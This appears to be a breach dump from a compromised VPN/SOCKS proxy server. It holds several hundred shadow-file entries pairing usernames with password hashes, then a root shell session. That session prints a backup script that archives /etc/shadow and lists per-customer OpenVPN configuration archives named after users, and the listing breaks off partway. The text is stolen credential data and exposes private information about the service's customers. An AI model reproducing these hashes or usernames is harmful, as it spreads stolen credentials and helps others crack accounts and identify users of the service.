+2G6ixqigXX:itYHt1qHMyxg6:14838:0:99999:7::14868: +FZ6nGPBlnq:itTB9Xib/.Jms:14838:0:99999:7::14868: +N4WUxGoeHX:itEmsj0kbt5Ig:14838:0:99999:7::14868: +3qoY48h6od:itzq1YDUTChmo:14839:0:99999:7::14869: +0KltTgDdxs:itjH.XV1RHImM:14839:0:99999:7::14869: +KnOIZkAYhv:itB/NLcosNZao:14840:0:99999:7::14870: +pduruQrvQw:itiNBdTTqSHXc:14841:0:99999:7::14871: +gfPh6U7BSL:itCwYFdL4JCUs:14842:0:99999:7::14872: +5d4PClWw9W:it8p4QD0G52a.:14842:0:99999:7::14872: +X3IwwuMhVn:itNC9p4Jw4Sew:14842:0:99999:7::14872: +9lKRF8UVul:itpPmVNnqzz8s:14843:0:99999:7::14875: +7OEkZFXfrj:itW9kD.grdiZc:14844:0:99999:7::14874: +XR9kXMus18:itup25xiWxlJE:14844:0:99999:7::14874: +LeJdtNDj0s:itu.0zdvPYBqU:14844:0:99999:7::14874: +sMdDwKbykL:itUWFJ7x2CEvE:14844:0:99999:7::14874: +RLPQ9lCkkg:itSEmJMpmRKuY:14845:0:99999:7::14875: +m07JSN8S1t:ithZZB/vxmf9s:14845:0:99999:7::14875: +KoW5ucmliR:itbs5gLqLFQ6U:14845:0:99999:7::14875: +vxaNuWuV5A:itQ/9L7nfjCGs:14846:0:99999:7::14876: +r6cQANOWcM:iteuR8tiYJc0A:14846:0:99999:7::14876: +GefhxHzMLB:itbcf7Sdv5haA:14847:0:99999:7::14877: +gghzgxMlzK:itv2DXUhR8k.E:14848:0:99999:7::14878: 
+dTECuvvcnY:itjIptA916Ebc:14848:0:99999:7::14878: +teamsocks:itt.x7Yyh3o4c:14848:0:99999:7::15706: +2ZzW1TPwek:italJuFQJ5a3s:14850:0:99999:7::14880: +98pASZD7ZL:itxSgbMMIp5Ss:14850:0:99999:7::14880: +rgNCfMxMDE:itUv8r76CvnFE:14852:0:99999:7::14942: +TPJNO6U7gB:it3nK7o5rGQTs:14854:0:99999:7::14884: +ZfQAMBcfd9:itn/Ahnp4SGYI:14855:0:99999:7::14885: +DWJLuNgRHq:it7fcSOrx.qzs:14856:0:99999:7::14886: +26PWTAtsMQ:itp0wE97MeJeY:14856:0:99999:7::14886: +wiDxLyK5di:itGyNef3zsBUc:14856:0:99999:7::14886: +OOueJqB7Ux:itLOQI2IJENTA:14856:0:99999:7::14946: +EaDZkcpMhf:itabLuw41OymE:14856:0:99999:7::14886: +swj3AHcyct:itgTFah5u7zEE:14857:0:99999:7::14887: +tf1x5jgZf7:it5.he.1J8Tos:14857:0:99999:7::15217: +fTkJjFodJR:itlImxgGtzX8E:14858:0:99999:7::14888: +q8Ospeoqjm:itfK2S6qHfdY.:14858:0:99999:7::14888: +atIdo8CMgl:itDJAu0FCjkD6:14858:0:99999:7::14888: +AIVtIPpwbI:it./a4jMDch9s:14858:0:99999:7::14888: +83ssqOi2mG:itf5ysL1ik1Uo:14859:0:99999:7::14889: +mDhIWzTPpL:itlbdpvX.70XI:14859:0:99999:7::14889: +aw1h0yzOXG:it7nEFlm.U1HE:14860:0:99999:7::14890: +8aXdZvgEAL:itHvOP3gWy0Ek:14860:0:99999:7::14890: +7DpjZkkKRH:it8lCum3QfKEE:14861:0:99999:7::14952: +AA4KnP2gQo:itYZtCLpMWh.6:14861:0:99999:7::14891: +OdJUE9NXz0:itPdSjh4MZGNk:14861:0:99999:7::14891: +WRwA7CA595:itk9xrbc96b6k:14862:0:99999:7::14892: +UHJXsI3u7T:itvRm6Pm8LxZs:14862:0:99999:7::14896: +AfPMi3Orqx:itK3vLE/cImqE:14862:0:99999:7::14892: +IIpk9TW4Hy:itjUMQ7TIWFks:14863:0:99999:7::14893: +GfXK6QYZvV:itEba4yQ5bD7Y:14863:0:99999:7::14893: +O2JLXab4Qb:itCguhLtUWcso:14864:0:99999:7::14894: +abobJxNBqT:itPzo69efPDNI:14865:0:99999:7::14895: +PAZYQvYMzp:itJXiA.Q6LtCs:14865:0:99999:7::14895: +mein:itz93owDvH2ig:14868:0:99999:7::14975: +In1AVHseTI:its.B5WuD6CPI:14868:0:99999:7::14898: +1yNGl2LCqo:itfhGvLrzeOro:14869:0:99999:7::14899: +UcblLYHagd:itrGN5VJ63iv2:14870:0:99999:7::14908: +GXFmqv0v6j:it4egLMyCOPXQ:14870:0:99999:7::14960: +eb0MkURFMR:iteVQ0NCSyuz2:14871:0:99999:7::14901: +ZF0P5R5HY1:itYKl7wO/tN6w:14871:0:99999:7::14901: 
+raiesY1Uya:it9XdP1qAJmpI:14871:0:99999:7::14961: +6vWXOICD5H:itAlbixHt8.fY:14871:0:99999:7::14901: +EHgdxvxbz6:it6FuhzCGg6TA:14871:0:99999:7::14901: +A9cAJOMNCY:it57H1zG3qv.Y:14872:0:99999:7::14901: +tHx7Nh5Kfp:itaW6Jr4ZZU.A:14874:0:99999:7::14979: +cvs7ZHnMch:itqel0UM7hH0k:14874:0:99999:7::14904: +R2XHmC62ZS:itSJbO1UjIVk.:14874:0:99999:7::14904: +OthdQ1Nmh5:itHAEGeiEMFhc:14874:0:99999:7::14905: +bhUizLPv0M:itHrknSzaql8U:14875:0:99999:7::14905: +FqBNIU3BXX:itL7IoJ8HGtjQ:14875:0:99999:7::14905: +cYuowtqfqp:it7vPDLMFamNU:14877:0:99999:7::14913: +ohLtOJoye9:itDe3UkvVMw/o:14877:0:99999:7::14967: +0xlfaHuCkh:itgwvKix98Szs:14879:0:99999:7::14909: +9oaRxjmjhy:itG4hyGTxFl9U:14881:0:99999:7::14911: +8YNxD3ah6D:itg0cQ4Ya.K2A:14881:0:99999:7::14911: +vd8oJtJgZr:itkGNuz.DvpB.:14883:0:99999:7::14913: +NwIUjcCYZG:itn7cOK0MxTPU:14884:0:99999:7::14914: +4nduuzyTQx:itmTdvrcDqztk:14885:0:99999:7::14915: +9qAqHLtLBx:it1RA5I5xwmyo:14886:0:99999:7::14939: +tuy9erQgxJ:itz9g1V7Y1Vog:14886:0:99999:7::14916: +GMunVltQvi:itlZMoR4eis5Q:14887:0:99999:7::14917: +sqYWjLaKXf:itaBZ/6eFpuME:14887:0:99999:7::14917: +ymLHzXSVjD:itiepJpQGPLR2:14888:0:99999:7::14918: +cG6fOsmfgT:itVe1Sv269.cE:14888:0:99999:7::14918: +Xv02xz1TQc:itNvLoD4b2F2U:14888:0:99999:7::14918: +13rRlbMsXc:itBiYQEEILlTA:14889:0:99999:7::14919: +o1NbEhdi1P:it5mVEaFWNf1.:14892:0:99999:7::14922: +SvOn61Ck0K:itTHDnZHL3bH6:14893:0:99999:7::14923: +LykwDkKp22:itk3nH54N5/lA:14894:0:99999:7::14924: +gDFHnIx6gq:itCJAnpVw.1oE:14894:0:99999:7::14929: +BQBra5cl9R:itxMiTR8/w.HU:14894:0:99999:7::14953: +4DaHNYAOXR:it/K.0bHmCxBM:14894:0:99999:7::14924: +mybkiYHe4L:itHs/OAKJg9PA:14895:0:99999:7::14935: +EZPpg2A55v:itUuxKhoP1VMI:14895:0:99999:7::14925: +ZtLdtMOxjz:itvFAdL7qAoAs:14896:0:99999:7::15256: +zyDY1v3Ifs:itxQpXl2lf5sw:14897:0:99999:7::14927: +vk9rnSCr7X:itjnkjv6.SGWY:14897:0:99999:7::14927: +nBeRUhO19Z:itPauEauIQk66:14897:0:99999:7::14927: +TeXbvEj3oJ:itr2mNVe6XTuo:14898:0:99999:7::14928: +2Fr6Xq4WyM:it3/yboYrUhVg:14898:0:99999:7::14928: 
+yZsxPqnHdR:itabo7ALxf5rQ:14898:0:99999:7::14928: +uQ4lOfB4g0:it/PdCIWid8A6:14898:0:99999:7::14988: +tMOYcIGsBO:itPslV9tgLazM:14899:0:99999:7::14929: +rbcBkgkMCF:itdT/Uyv7HH.c:14899:0:99999:7::14989: +r0FjhxSADo:itSltUoI6eVvI:14899:0:99999:7::14929: +88rM31v2oJ:itwg7qhCbYMag:14899:0:99999:7::14929: +d3rdsSAt5s:itWSsOAmAXv/s:14900:0:99999:7::14990: +frpOFX7CGJ:ituk9m0heMvJ.:14900:0:99999:7::14930: +DN4SdAwDUX:itqnCyrFKN/gM:14900:0:99999:7::14930: +SWsT6SYBW0:itv7UN0iZGIDo:14901:0:99999:7::14931: +mqdlYki3Bu:itoLRPE/V.0qY:14901:0:99999:7::14931: +Kf6hkNRFbt:itMMt7WyGBLmY:14902:0:99999:7::14932: +VRKabwxsRz:ithk9weHHtqcc:14903:0:99999:7::14933: +W149pluZd9:itx/z6pbrhv3I:14903:0:99999:7::14933: +UzPuS4CkgJ:itoICMixQ6M8Q:14904:0:99999:7::14934: +UsGU5GLZmf:it7aNFj10DUTs:14904:0:99999:7::14934: +r4xLEdMjeu:itHsIkGueCPbk:14906:0:99999:7::14936: +lutZaKA8pP:itc61fNMFA/3E:14907:0:99999:7::14936: +usDgH6KNsm:itd06qFZIEABM:14907:0:99999:7::14937: +CMSc3fnm0o:itI3zX6jizp9o:14907:0:99999:7::14937: +vYwuL6Uwia:itcM5h0kqE6Ow:14908:0:99999:7::14938: +yaSgVmndrd:it3y5K4Adi7w6:14909:0:99999:7::14939: +dfvW2pna2L:itINr2NMjgQpM:14910:0:99999:7::14940: +ng3LKLliu1:it7C53g6Lz48A:14912:0:99999:7::14942: +8SVb2iLNbA:itOjHA6.KhcCk:14912:0:99999:7::14942: +3aiHc3W1co:itZc.Y8xjdHo6:14913:0:99999:7::14942: +mON9q5Awho:itk.QmqSq0R9I:14913:0:99999:7::14943: +FRXf5cUHNA:itkv83lbiIlDQ:14913:0:99999:7::14943: +X2w1wWC8cc:itAZHmcDJATPY:14914:0:99999:7::14944: +KbZzI1EGD7:itQYRLQgetcXo:14914:0:99999:7::14944: +vwX6HwC8Lh:itIBgY/SDaCf2:14914:0:99999:7::14944: +YbDmrQ3uHX:itwHmpepzmsyo:14914:0:99999:7::14944: +XwrlqzZcqt:itUzpgEXgBeQY:14914:0:99999:7::14944: +Zr5u4mLaor:itfloQkXhD5u6:14915:0:99999:7::14945: +yRkX9kmf4d:it8vky1.FP1v.:14915:0:99999:7::14945: +VPPl3s7YUL:itiEkuDw5DI7g:14916:0:99999:7::14946: +OTgrnEWUwc:itOt0S/uMUf4M:14916:0:99999:7::14946: +G0OREuDm37:it3eS6p4sq3Zc:14916:0:99999:7::14946: +CQyjF4u7CS:itlt3wTyLL1mY:14916:0:99999:7::14946: +XwU6xeJKMx:it/6xa8WMPDh.:14917:0:99999:7::14946: 
+aklcI4G2Hr:itznhpJlcPCLE:14917:0:99999:7::14947: +mT7JPIqVuf:itw4vdCKM5hh6:14917:0:99999:7::14947: +gsZxRf05sx:it5HQlC6kFh4k:14917:0:99999:7::14947: +v716hX8oaW:itEqiR8DNv1qA:14919:0:99999:7::14949: +Mmh3M4oP0v:itOBibBZTmXD6:14920:0:99999:7::14950: +ctV3NEzitO:itBbFVXGBG4BU:14920:0:99999:7::14950: +wKer3VQNa8:itnDVU6wdMvG.:14921:0:99999:7::14951: +76BuKJAIQs:itQPcXWud8yfg:14921:0:99999:7::14951: +k1dO6lfMNd:it90nC0giFbtw:14922:0:99999:7::14952: +I6J3JHUqC1:it/srYUBNHo9M:14922:0:99999:7::14952: +GYoFHeDm0z:itBQLqu6UxphI:14922:0:99999:7::14952: +72YV5GHBVx:itQ8ASN1Cpbfk:14923:0:99999:7::14953: +G71wfQEPoC:itVuq/dID19J6:14924:0:99999:7::14953: +HgcCrXDKen:itKN1JIcX0nBw:14924:0:99999:7::14954: +gbzSM7ywwW:itT7p0thywHrI:14925:0:99999:7::14954: +dfJJwbDOaG:it8swpmidw2XI:14925:0:99999:7::15015: +4Saf8LwCcR:it9dSQLwlJtIs:14927:0:99999:7::14957: +1eeUWOlK9E:itzm7AcIRfnxY:14928:0:99999:7::14987: +Cll4KDM0W3:ita3TIkuFg1/2:14929:0:99999:7::14958: +OJAEWyDwCI:itqAL74wVHS9w:14929:0:99999:7::15019: +q1iyUEbI5V:itqyIpWotaOKY:14930:0:99999:7::15020: +2N1Uo47Mlg:itxcvxQxkmIJw:14931:0:99999:7::14961: +ruVtSN24pr:it3hysvh0JWzg:14932:0:99999:7::14962: +zJltMD4mG9:itTv938Zg94SM:14934:0:99999:7::14964: +WkUUS9RQf0:it.o2Ii05q/rQ:14934:0:99999:7::14964: +bWauNdcsMn:itRPpz0Y9lxlg:14934:0:99999:7::14994: +S5UKpRwg51:itNLqhJ7Hekt2:14934:0:99999:7::14964: +stFt5RwE33:itIYMTiTEIJFA:14935:0:99999:7::14965: +OCUbNto6Bg:itwtuO08u6Whk:14935:0:99999:7::14965: +eIxatCSG1U:itZchcu.o/waE:14935:0:99999:7::14965: +zXcXCYaIpo:it7JduWDCGa7I:14936:0:99999:7::14966: +RBNgJIRt49:itHHvqlfsenFs:14936:0:99999:7::14966: +niSxFcVo6S:itxdORWkQMuLU:14936:0:99999:7::14966: +Uxx9MvILLz:itonzxA2QqSCo:14937:0:99999:7::14967: +klYUlzI7cK:it5P8KkyhBUx.:14938:0:99999:7::14968: +6m9Y1QaKr3:itdviqsn/UOgM:14938:0:99999:7::14968: +lVXZHCarqJ:ittqGaCR7CVzY:14938:0:99999:7::14968: +4GWL9WXzxF:itmpwb3peAPso:14938:0:99999:7::14968: +JxaTdAV8Rw:itJeetI8t0THk:14938:0:99999:7::14969: +8P7jKJ2Nlh:itcCo7MW2z5c2:14939:0:99999:7::14969: 
+vkE7Afv1aW:itxj1CCnY0KVU:14939:0:99999:7::14969: +2Er5XcDGWA:itVQQjFaoLsVs:14939:0:99999:7::14969: +qwBUev5nEp:ityFIjDrBhcMY:14939:0:99999:7::14970: +muIspwxptl:itGdEXkF3KasY:14939:0:99999:7::14970: +e5yhvJdeTw:itcISq4222ADM:14940:0:99999:7::14970: +XUxzr4xMlT:itxh06MdAbfAc:14940:0:99999:7::15030: +va20H8Ol9R:itGRrgpip6fho:14940:0:99999:7::14970: +qsAbm8ZMyg:it3Ob3nUJuqU.:14940:0:99999:7::14970: +9An1Ctk2Qa:it2SEn0lMti9k:14940:0:99999:7::14970: +Ey5cDS72xR:it6G5reVhlop2:14940:0:99999:7::14970: +uCUqoIdGPa:itZuCKn5tD7XE:14941:0:99999:7::14971: +N6fG120epq:itVuvFFxaDk8E:14942:0:99999:7::14972: +gV0gXSFPQ8:itwtoSkg28amA:14942:0:99999:7::14972: +FvxPhU3XUz:itFgdFZMSk67A:14942:0:99999:7::14972: +iYoWJEuIeo:itPSTarGMLfTY:14942:0:99999:7::14972: +ybLYgoCPNG:itjTsMk3pE7e2:14944:0:99999:7::14974: +Z6pSiUldwy:ityDkEl8UvQc6:14944:0:99999:7::14974: +TkRcTTkRSF:itlk29O.cDvaE:14944:0:99999:7::14974: +wHgs7nrMld:it9XlfjywiXy6:14944:0:99999:7::14974: +nUYfzYpR4G:itvgu.6SeYDs6:14945:0:99999:7::14975: +8tEhjjRlAC:ithIZGhH1YWGs:14945:0:99999:7::14975: +JpChWSSU54:itmC7n8H/IzOI:14946:0:99999:7::14976: +EnwaHzdt35:itW5rIFvNIESI:14947:0:99999:7::14977: +juTd17x1Nc:itdIXw1efcit2:14947:0:99999:7::14977: +TOTQ91BEwS:itETt4OL8daUg:14947:0:99999:7::14977: +6UTA6cTgc2:it/jPTOoUX7RU:14947:0:99999:7::14977: +93EP0GUfGC:itjZCu2VpVTto:14947:0:99999:7::14977: +N66NJ15WGg:itvfxHbWSpAGs:14948:0:99999:7::14978: +yXmWg290xo:itd6FNm6EstQo:14948:0:99999:7::14978: +rcc6AHS1Jg:itaW/avCpeX7I:14949:0:99999:7::14979: +zXMmeDGbqP:itbKfASBg5kjQ:14949:0:99999:7::14979: +7tdzW87F9R:it59iCPlIQ2nI:14949:0:99999:7::14979: +dpswkJLMwG:itq8CorTAKvbQ:14949:0:99999:7::14979: +azsvod1Qyg:itVYBbnLQOXvs:14950:0:99999:7::14980: +72ju0LjHvy:it1M93rvoYWOs:14950:0:99999:7::14980: +73yatKHdOE:itgExui2oxI6k:14951:0:99999:7::14985: +UWC2JU92e0:itqqXARCLiWbI:14951:0:99999:7::14981: +i1BmroAIeM:itLVHBV2drUzk:14951:0:99999:7::14981: +8sAlXL7Ibr:it64Q2stSnBHA:14953:0:99999:7::14983: +kk2M3z5gcp:itBHe6tqX.3XA:14953:0:99999:7::14983: 
+9cK5xC48nV:itl87NEjGEK2w:14954:0:99999:7::14984: +SBAetxCLTy:itnnHODH7U6ss:14954:0:99999:7::14984: +8iZ9BfefaC:itqzc7PIHyg9U:14955:0:99999:7::14985: +D73JHDlBCn:it5HRy53l43Y6:14955:0:99999:7::14985: +OkpQWghNPU:it./ezuDx/YQE:14956:0:99999:7::14986: +gUADWitYGX:it/KOoOhBksMA:14956:0:99999:7::14986: +DaGvQaxltT:itLrqA5G31PN2:14956:0:99999:7::14986: +pBw5St2oIK:it553jDzNAPfc:14956:0:99999:7::14986: +f37WEzjkBK:itwnTkJDchqME:14956:0:99999:7::14986: +23101kMksS:itGlGqE/KXM32:14956:0:99999:7::14986: +OmXdWCH5Fq:it1RlH2X7DVAM:14957:0:99999:7::14987: +6HRKiqn5AS:it1T38X6cuM6c:14957:0:99999:7::14987: +p8aQLoUmKx:itrg.SUskuxyg:14957:0:99999:7::14987: +31YimlYNtc:itpkbpgDGcZ.s:14957:0:99999:7::14987: +P6q1AGVRjm:itkyYcDlznPYE:14958:0:99999:7::14988: +lK7CY8gP5z:ithVNEA6Zp2sY:14958:0:99999:7::14988: +y5MJDV3DL9:itpXG8NQzmABo:14958:0:99999:7::14988: +qAcEd9FYMX:itVRMAu6wGMC.:14958:0:99999:7::14988: +GpEu7dTAI7:itB3YWx6ee0SY:14959:0:99999:7::14989: +MSMzq0euqr:itiISfOIxsxaE:14959:0:99999:7::14991: +inlnCLfVUo:itvhTbyWymA22:14960:0:99999:7::14990: +ollSVqKLpa:itVpMPYmRMELQ:14961:0:99999:7::14991: +s2C71Wifr9:itFk8miODAIbI:14961:0:99999:7::14991: +UxsvWRQWBq:it7xuKEJ86nZ6:14962:0:99999:7::14992: +QY6arE2Ydq:itHpW7AaspT.w:14962:0:99999:7::14992: +b5sNwDdmEK:itmvq9eooqmO6:14962:0:99999:7::14992: +pdpUuNAtXK:it0R6bx0FyZlE:14962:0:99999:7::14992: +NxsMofNyV2:itLK/56KKYaog:14962:0:99999:7::14992: +DtzoQ2Xw7q:itYVSREQMSdBw:14962:0:99999:7::14992: +tDBq7HfG3r:itzVytgnZiSAU:14963:0:99999:7::14993: +f8cDerX7wf:itFrqaj9jTUlU:14963:0:99999:7::14993: +QoTkaCA5hf:itiV6gqc74Sqw:14963:0:99999:7::14993: +Lmh9L2R8qz:itd7geSqRbFrk:14964:0:99999:7::14995: +kzgMwiKIDN:itT6bPP4kO.Rw:14965:0:99999:7::14995: +6pFUWCUnmw:itvTnr5tKE9Qw:14966:0:99999:7::14996: +Pgh2JWajwc:itoBQz08YAmFY:14966:0:99999:7::15056: +PKSb4b3iAN:itnJSnuTJIPf.:14966:0:99999:7::14997: +5DeP78tYXf:itSvfA1ftcp52:14967:0:99999:7::15327: +ZDrNQotOat:ithoGBbOmxVC6:14967:0:99999:7::14997: +rd5t8jfvnj:itgFK3/lIbbHk:14970:0:99999:7::15000: 
+vuqRa4K55i:itnwIbDrEdQQ.:14972:0:99999:7::14972: +itMjMX8Zgb:itvQs9lGWMpPE:14976:0:99999:7::15006: +MyxPyfxyxX:it4om/OGRqVaQ:14977:0:99999:7::15007: +BcLoH5F0R3:itS5U3vZ.ZSJE:14977:0:99999:7::15007: +9T9jRHvZ7q:it/k5IGATH0sU:14977:0:99999:7::15007: +ienW7EvZzk:it/3va3uNrm/g:14977:0:99999:7::15007: +kdo3z10kOe:it0m6oAlzDdt2:14978:0:99999:7::15008: +WX4JFyd3V4:itoQdv/BhznWg:14978:0:99999:7::15008: +PAhJp3OPbl:itctUnxxabPF.:14980:0:99999:7::15010: +cfmu8MNhEM:itiDjVMKDet5s:14981:0:99999:7::15011: +iyW122H0oe:itERsdw.iVxl2:14981:0:99999:7::15011: +3YePbBy2tp:it0lHPhi5gXbU:14981:0:99999:7::15011: + +# cd / && ls -la +total 176 +drwxr-xr-x 20 root root 4096 Jan 6 13:13 . +drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. +-rw------- 1 root root 1024 May 8 2010 .rnd +lrwxrwxrwx 1 root root 39 Nov 25 20:52 aquota.group -> /proc/vz/vzaquota/0000003f/aquota.group +lrwxrwxrwx 1 root root 38 Nov 25 20:52 aquota.user -> /proc/vz/vzaquota/0000003f/aquota.user +-rwxr-xr-x 1 root root 172 Aug 21 21:34 backup.sh +drwxr-xr-x 2 root root 4096 Nov 15 02:26 bin +drwxr-xr-x 2 root root 4096 Feb 2 2010 boot +drwxr-xr-x 7 root root 4096 Jan 6 13:13 dev +-rw-r--r-- 1 root root 4416 Sep 13 14:07 e107_files +drwxr-xr-x 70 root root 4096 Jan 7 19:07 etc +drwxr-xr-x 3 root root 4096 May 9 2010 home +-rw------- 1 root root 0 Nov 2 10:30 ipp.txt +drwxr-xr-x 10 root root 4096 May 11 2010 lib +lrwxrwxrwx 1 root root 4 Nov 25 20:52 lib64 -> /lib +drwxr-xr-x 2 root root 4096 Feb 2 2010 media +drwxr-xr-x 2 root root 4096 Feb 2 2010 mnt +drwxr-xr-x 2 root root 4096 Feb 2 2010 opt +dr-xr-xr-x 171 root root 0 Jan 6 13:13 proc +drwxr-xr-x 5 root root 4096 Jan 4 20:32 root +drwxr-xr-x 2 root root 4096 Feb 2 2010 sbin +drwxr-xr-x 2 root root 4096 Feb 2 2010 selinux +drwxr-xr-x 2 root root 4096 Feb 2 2010 srv +drwxr-xr-x 3 root root 0 Jan 6 13:13 sys +drwxrwxrwt 4 root root 4096 Jan 7 18:12 tmp +drwxr-xr-x 11 root root 4096 Feb 2 2010 usr +drwxr-xr-x 14 root root 4096 Feb 2 2010 var +-rwxr-xr-x 1 root root 83749 
Sep 8 21:27 xgoogler + +# cat backup.sh +#!/bin/bash + +name=`date | sed -e "s/ /_/g"` +name=`echo "/${name}__vpn_backup.tgz"` +tar cfvz "$name" /var/www/ /root/ /etc/openvpn/ /etc/sockd.conf /etc/passwd /etc/shadow + +# cd /root && ls -la +total 92 +drwxr-xr-x 5 root root 4096 Jan 4 20:32 . +drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. +-rw------- 1 root root 6593 Jan 6 12:59 .bash_history +-rw-r--r-- 1 root root 409 May 9 2010 .bashrc +-rw------- 1 root root 124 Jan 3 13:02 .lesshst +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +-rw------- 1 root root 1024 Jan 7 05:00 .rnd +drwx------ 2 root root 4096 Jun 20 2010 .ssh +-rw------- 1 root root 6863 Jan 4 20:32 .viminfo +-rw------- 1 root root 2288 Nov 7 00:39 .viminfo.tmp +-rw------- 1 root root 0 Nov 7 00:39 .viminfz.tmp +-rwxr-xr-x 1 root root 698 May 9 2010 createSSHsocks.sh +-rw-r--r-- 1 root root 15716 Sep 13 14:12 e107_plugins +-rwxr-xr-x 1 root root 27 Oct 27 19:50 killsockd.sh +-rw-r--r-- 1 root root 5052 Aug 28 16:06 noVPNaccess +-rw-r--r-- 1 root root 53 Aug 5 00:18 sshCreateLog +drwx------ 2 root root 4096 Nov 7 00:39 v90992 +drwx------ 2 root root 4096 Nov 7 00:39 v90992v90993 + +# cat killsockd.sh +#!/bin/bash + +killall sockd + +# cd /var/www && ls -la +total 2388 +drwxr-xr-x 3 root root 36864 Jan 4 20:32 . +drwxr-xr-x 14 root root 4096 Feb 2 2010 .. 
+-rw------- 1 root root 1024 Jan 4 20:17 .rnd +-rw-r--r-- 1 root root 3588 Aug 10 22:04 0x00321279_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 12 2010 0x0032291_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Oct 7 22:28 12dima1226315_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Nov 4 15:41 13scarface3731276_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Dec 8 12:16 21Kms24551_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Sep 2 19:15 2fast17248_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Jul 26 23:46 3lanka19070_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Nov 19 23:26 Abs0lut11214_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Aug 10 18:00 Accountcc19547_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 26 11:45 Alanka11177_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Dec 28 13:11 Alanka30566_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 Oct 22 07:58 AndreWeiher00723178_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Aug 3 20:35 Anducar31060_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Sep 5 08:18 Anducar7753_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 29 23:55 Anony15422_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 14 19:31 Anonym0us9696_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Dec 15 14:19 Axonym26091_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jul 4 2010 B0rnBaby4754_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Oct 31 18:25 B4c4rd124091_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Aug 11 04:20 BEKANNTMACHUNGEN15913_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jun 4 2010 Baduila3649_OPENVPN.tgz +-rw-r--r-- 1 root root 3399 Jul 26 18:01 Bero1346519125_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Jul 27 14:12 Bijusov1292_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Sep 28 20:34 BlaBla14724_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Sep 13 02:55 Butch1229_OPENVPN.tgz +-rw-r--r-- 1 root root 3617 Jul 1 2010 Butch21700_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 11 21:57 Butch26236_OPENVPN.tgz +-rw-r--r-- 1 root root 3434 Nov 24 17:43 Carcharias198028154_OPENVPN.tgz +-rw-r--r-- 1 root root 3424 Oct 13 15:29 Carcharias19804168_OPENVPN.tgz 
+-rw-r--r-- 1 root root 3589 Jul 17 18:07 Chaos13009_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Jun 25 2010 CherryPicker28808_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 17 2010 Chillywilly14043_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jul 28 20:24 Chillywilly19583_OPENVPN.tgz +-rw-r--r-- 1 root root 3431 Jun 3 2010 Chiruge7152_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 23 19:44 Cifer2213003_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Aug 10 22:06 Cifer2223193_OPENVPN.tgz +-rw-r--r-- 1 root root 3563 Sep 13 14:35 Cifer228621_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Jun 15 2010 CodeBeat13144_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jul 17 01:56 CodeBeat24591_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Oct 17 21:55 CodeBeat31195_OPENVPN.tgz +-rw-r--r-- 1 root root 3624 Jun 26 2010 Crackstar133730456_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jun 1 2010 Deadcollector6982_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Jul 20 22:40 Delphinko12230_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 19 01:27 Delphinko19165_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Nov 29 16:56 Delphinko9555_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 20 02:45 Device27308_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Sep 22 02:10 Device31313_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 18 01:50 Device999_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Oct 13 04:40 DingDong18559_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Dec 27 07:41 DingDong25025_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Nov 23 02:05 DingDong32694_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 May 31 2010 Dominik2990_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Nov 3 03:49 DrHouse30072_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jan 3 07:10 Dukeraider16313_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 21 18:07 Dukeraider16393_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jul 3 2010 Elite13372193_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 12 20:49 Emrano27523_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Dec 8 19:36 EsseX10367_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Aug 2 21:32 
